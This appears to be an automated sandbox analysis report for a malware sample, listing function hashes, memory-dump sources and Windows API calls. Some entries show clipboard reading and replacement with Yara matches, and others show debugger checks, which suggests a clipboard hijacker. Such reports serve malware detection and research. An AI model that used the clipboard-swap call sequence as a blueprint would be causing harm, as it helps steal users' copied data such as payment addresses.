                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction ID: 8cb0d109644ce714bdc84d03a3357bbc544987171c927014f260ece32c00e347
                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                      • Instruction Fuzzy Hash: 26D0123114512877DB002A94DC09BCE7B1CDF09B66F008011FB0DDD180C770954046E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                      • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                      • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                      • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2638373210-0
                                                                      • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                      • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                      • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                      • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                      APIs
                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                                      • String ID:
                                                                      • API String ID: 323602529-0
                                                                      • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                      • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                      • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                      • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_catch
                                                                      • String ID:
                                                                      • API String ID: 3886170330-0
                                                                      • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                      • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                      • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                      • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                      • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                      • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                      • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                      • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                      • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                      • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                      • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                      • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                      • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                      APIs
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw
                                                                      • String ID:
                                                                      • API String ID: 2005118841-0
                                                                      • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                      • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                      • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                      • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                      • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                      • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                      • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009DA166
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction ID: 9db950cec028cd4e82b14aa75b50917419a788d634cc80a9e2db556dcd600c95
                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                      • Instruction Fuzzy Hash: EC113C79A40208EFDB01DF98C985E98BBF5AF08350F05C095F9489B362D371EA90DF91
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 024A194D
                                                                      • Sleep.KERNEL32(00001541), ref: 024A1957
                                                                        • Part of subcall function 024ACE77: _strlen.LIBCMT ref: 024ACE8E
                                                                      • OpenClipboard.USER32(00000000), ref: 024A1984
                                                                      • GetClipboardData.USER32(00000001), ref: 024A1994
                                                                      • _strlen.LIBCMT ref: 024A19B0
                                                                      • _strlen.LIBCMT ref: 024A19DF
                                                                      • _strlen.LIBCMT ref: 024A1B23
                                                                      • EmptyClipboard.USER32 ref: 024A1B39
                                                                      • GlobalAlloc.KERNEL32(00000002,00000001), ref: 024A1B46
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 024A1B70
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 024A1B79
                                                                      • GlobalFree.KERNEL32(00000000), ref: 024A1B80
                                                                      • CloseClipboard.USER32 ref: 024A1BA4
                                                                      • Sleep.KERNEL32(000002D2), ref: 024A1BAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                      • String ID: 4#E$i
                                                                      • API String ID: 4246938166-2480119546
                                                                      • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                      • Instruction ID: 3ed04189f008729580de3e0b948b4ab9d441e2db8cadda207e324c32fea84cf1
                                                                      • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                      • Instruction Fuzzy Hash: E8512530C01394DAE3119FA8ED65BFD7774FF3A306F04522AD809A6172EB709681CB69
                                                                      APIs
                                                                      • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024A239C
                                                                      • GetClientRect.USER32(?,?), ref: 024A23B1
                                                                      • GetDC.USER32(?), ref: 024A23B8
                                                                      • CreateSolidBrush.GDI32(00646464), ref: 024A23CB
                                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024A23EA
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024A240B
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 024A2416
                                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 024A241F
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024A2443
                                                                      • SetBkMode.GDI32(?,00000001), ref: 024A24CE
                                                                      • _wcslen.LIBCMT ref: 024A24E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1529870607-0
                                                                      • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                      • Instruction ID: 0e8c66200a156209604e3b11d28845cf983622776adc4df011ad4ef82ec777ea
                                                                      • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                      • Instruction Fuzzy Hash: 1C71FF72900228AFDB62DF68DD85FAEB7BCEB09711F0041A9F509E6151DA70AF84CF10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                      • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                      • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                      • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024DBCF4,?,00000000), ref: 024DBA6E
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024DBCF4,?,00000000), ref: 024DBA97
                                                                      • GetACP.KERNEL32(?,?,024DBCF4,?,00000000), ref: 024DBAAC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                      • Instruction ID: 29a921cb51f8c3ca3c960b7cff2a070b53e544459cba5c2c56387bf256feb7a6
                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                      • Instruction Fuzzy Hash: D1218336700105AAEB348F55D925BA777A6EB44E5CB57C067E90ADB300F732DE81C394
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                      • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                      • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                      • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024DBCB5
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 024DBD10
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 024DBD1F
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,024D0A1C,00000040,?,024D0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024DBD67
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,024D0A9C,00000040), ref: 024DBD86
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 2287132625-0
                                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                      • Instruction ID: 32782948bc3ccb76edf1ff4d5e6531e373f3e65276f1eb09355d6d9ef3311abe
                                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                      • Instruction Fuzzy Hash: FE5193719002099BEF11DFA5CC60ABF77B9FF14B08F06082FE900E7294EB719A418B61
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 2287132625-0
                                                                      • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                      • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                      • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                      • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C$C
                                                                      • API String ID: 0-238425240
                                                                      • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                      • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                      • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                      • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024D0A23,?,?,?,?,024D047A,?,00000004), ref: 024DB353
                                                                      • _wcschr.LIBVCRUNTIME ref: 024DB3E3
                                                                      • _wcschr.LIBVCRUNTIME ref: 024DB3F1
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024D0A23,00000000,024D0B43), ref: 024DB494
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                      • String ID:
                                                                      • API String ID: 2444527052-0
                                                                      • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                      • Instruction ID: 7c1cd337955dd42237f06a01f7eacb69faea9126d7ffb20bf45f3db75c6b65ab
                                                                      • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                      • Instruction Fuzzy Hash: D961E772600606ABEB25EF35DC65BBB73ADEF04718F15442FE905DB280EB74E5418BA0
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                      • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                      • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                      • String ID:
                                                                      • API String ID: 2444527052-0
                                                                      • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                      • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                      • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                      • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                      APIs
                                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastLocale$_free
                                                                      • String ID:
                                                                      • API String ID: 2834031935-0
                                                                      • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                      • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                      • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                      • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,024ADAD7), ref: 024CA732
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024ADAD7), ref: 024CA73C
                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024ADAD7), ref: 024CA749
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                      • Instruction ID: 626e4970af3046aff01b5f396fb40061e1e5dca619a53406ab9348aa7a6f6694
                                                                      • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                      • Instruction Fuzzy Hash: EB31C67490122CABCB61DF69D9887DDBBB8BF18711F6042EAE40CA7250E7309B858F44
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
